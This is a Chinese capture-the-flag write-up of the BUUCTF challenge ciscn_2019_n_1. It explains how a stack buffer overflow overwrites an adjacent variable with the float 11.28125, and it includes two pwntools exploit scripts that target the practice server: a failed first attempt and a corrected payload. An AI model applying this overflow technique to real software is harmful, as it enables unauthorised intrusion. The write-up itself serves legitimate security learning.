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BUUCTF的第四道题，ciscn-2019_n_1。
首先还是链接远端查看一下。

这里提示让猜一个数字，然后他告诉我们，这个数字应该是11.28125。这就有点掩耳盗铃了呀，但是输入了11.28125，还是在
说应该输入11.28125。可能是有点问题，ida打开查看一下。

可以看到主函数里，调用了三个函数，前两个都是set某个值，我们直接看func函数。

那这就很明显了，刚刚输入的值赋给了v1，但是这里是要让v2的值等于11.28125才可以。查看一下地址。

嗯，跟想象的一样，v2紧跟在v1后面，只要在输入v1的时候，让它栈溢出，覆盖掉v2就可以了。
不过我在这里输入的时候犯了一个错误

exp



from pwn import *

p = remote("node4.buuoj.cn", 25154);

payload = 'a' * 0x2c + p64(11.28125).decode("iso-8859-1");

p.recvuntil("number.");

p.sendline(payload);

p.interactive();

这样去执行脚本，没有完成，我想到了会不会是浮点数的原因。查了一下，发现p64这个函数使用来打包整数的，小数不可以。
而且，覆盖在地址上的应该是浮点数转化过之后的样子。

这里首先应该将浮点数转换为二进制数，然后修改为符号位+指数位+尾数位的形式，最后将它转换为十六进制，也就是
41348000。当然也可以不转换，因为这个浮点数在程序中有体现，那么肯定会有一个数据段记录着他的十六进制数。查看一
下。

可以看到这里就有41348000这个十六进制数字。修改脚本
exp

from pwn import *

p = remote("node4.buuoj.cn", 25154);

payload = 'a' * 0x2c + p64(0x41348000).decode("iso-8859-1");

p.recvuntil("number.");

p.sendline(payload);

p.interactive();

执行，获得flag。
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